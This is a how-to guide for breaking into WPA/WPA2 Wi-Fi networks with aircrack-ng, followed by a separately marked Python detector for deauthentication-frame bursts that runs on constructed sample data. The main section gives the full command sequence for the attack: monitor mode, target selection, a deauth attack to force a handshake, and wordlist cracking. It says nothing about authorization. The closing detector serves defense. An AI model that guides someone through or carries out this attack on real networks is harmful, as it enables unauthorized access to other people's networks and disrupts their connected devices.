HOW TO HACK WI-FI WITHOUT KALI LINUX?
Keep in mind that Kali Linux (formerly called "Backtrack") is not needed for hacking.
OBTAINING REQUIRED TOOLS:
To begin,
- Install the needed packages. Some distros contain the needed tools in the default repos and others do not.
- If they are not in the Ubuntu repos, add the "ppa:darklordpaunik8880/kalibuntu" PPA by typing "apt-add-repository ppa:darklordpaunik8880/kalibuntu".
- Once the repos are added, on Debian-based systems type "apt-get install aircrack-ng". (The "aircrack-ng" package adds many WiFi hacking tools and the package's dependencies provide additional utilities.)
Attack:
- Open a terminal and type "airmon-ng".
- This will display a list of detected WiFi devices on the local system that support monitoring (this feature is needed).
- Then, type "airmon-ng start INTERFACE" where "INTERFACE" is the desired wireless device (such as "wlan0") that supports monitoring.
- The terminal should display a monitor interface name (such as "mon0").
NOTE: After running the last command, you should see “(monitor mode enabled)” in the output.
- Type "airodump-ng MONITOR-INTERFACE" (where "MONITOR-INTERFACE" is usually mon0).
- If a "fixed channel -1" error message is seen, execute "ifconfig INTERFACE down" (where "INTERFACE" is a device such as wlan0) and retry the airodump-ng command. After the whole hacking process, remember to type "ifconfig INTERFACE up" to make the wireless card connect to the Internet as before.
- The airodump-ng command will return a list of detected WiFi hotspots.
- Look for one that uses WPA or WPA2 encryption (ENC), CCMP as the cipher, and PSK as the authentication method (AUTH).
- Once a hotspot has been selected, write down the ESSID, BSSID, and channel (CH).
- With the gathered information, type a command using the format "airodump-ng -w DIRECTORY -c CHANNEL --bssid BSSID MONITOR-INTERFACE".
- The chosen directory is used to store files containing the handshake authentication data used when a device connects to the WiFi. Now, when a client connects or reconnects to the WiFi, your system will watch how the authentication process occurs.
Waiting for a client to reconnect may take a while. Thankfully, this process can be sped up. In that same terminal output,
- Look under the "Station" heading for a BSSID.
- Write down that BSSID, which is the BSSID of a client connected to the selected WiFi.
- In a new terminal, type "aireplay-ng -0 2 -a WIFI-BSSID -c CLIENT-BSSID MONITOR-INTERFACE" using the gathered information.
- The "-0" parameter means deauth mode will be used and "2" deauth packets will be sent.
- This will trigger the router to reconnect/reauthenticate the chosen client. This is how the authentication process can be analyzed.
On the terminal with airodump-ng running, a "WPA handshake" message should appear. The aireplay-ng terminal can be closed. Keep the four generated files that are placed in the selected directory and remember to write down the WPA handshake hexadecimal number.
- Now, the collected data can be analyzed locally to crack the password.
- With the gathered data, type a command in the form "aircrack-ng -a2 -b WIFI-BSSID -w WORDLIST-PATH DIRECTORY/*.cap".
- Use "-a1" for WPA and "-a2" for WPA2. The directory is the same one chosen previously.
- The wordlist file is a plain-text file containing many possible passwords. Be sure to obtain a wordlist file.
If the process is successful, then the user will see a "KEY FOUND!" message and the message will display the password.
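From the defender's side, the deauthentication step above is observable on the air as a run of deauth frames between one access point and one client inside a short window. The detector below is an added example, not part of the original post: it parses raw 802.11 management frames and flags such bursts. The threshold, window, function names and sample MAC addresses are assumptions and constructed data.

```python
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC = 0x0C, 0x0A  # 802.11 management-frame subtypes

def parse_mgmt(frame):
    """Return (subtype, dst, src, bssid, reason) for a deauth/disassoc frame, else None."""
    if len(frame) < 26:  # 24-byte MAC header (radiotap already stripped) + reason code
        return None
    version, ftype, subtype = frame[0] & 3, (frame[0] >> 2) & 3, frame[0] >> 4
    if version != 0 or ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return subtype, frame[4:10].hex(":"), frame[10:16].hex(":"), frame[16:22].hex(":"), reason

def detect_bursts(timed_frames, threshold=10, window=1.0):
    """Alert once per (bssid, station) when at least `threshold` deauth/disassoc
    frames for that pair fall inside `window` seconds (both values are assumptions)."""
    recent, alerted, alerts = defaultdict(deque), set(), []
    for ts, frame in timed_frames:
        parsed = parse_mgmt(frame)
        if parsed is None:
            continue
        _, dst, src, bssid, _ = parsed
        key = (bssid, dst if src == bssid else src)  # station = the non-AP end
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop timestamps that left the sliding window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((ts, key[0], key[1], len(q)))
    return alerts

def build(subtype, dst, src, bssid, reason):  # hypothetical helper for sample data
    hdr = bytes([subtype << 4, 0, 0, 0]) + bytes.fromhex(dst + src + bssid) + b"\x00\x00"
    return hdr + struct.pack("<H", reason)

# Constructed sample capture: locally administered MACs, not real devices.
AP, STA, STA2 = "02aabbccdd01", "02aabbccdd02", "02aabbccdd03"
SAMPLE = [(0.0, build(DEAUTH, AP, STA, AP, 3)),        # one client leaving normally
          (2.0, build(8, "ffffffffffff", AP, AP, 0)),  # beacon, ignored by the parser
          (3.0, build(DISASSOC, AP, STA2, AP, 8))]     # single disassociation
for i in range(20):                                    # burst in both directions
    src, dst = (AP, STA) if i % 2 == 0 else (STA, AP)
    SAMPLE.append((5.0 + i * 0.01, build(DEAUTH, dst, src, AP, 7)))

if __name__ == "__main__":
    print(detect_bursts(SAMPLE))
```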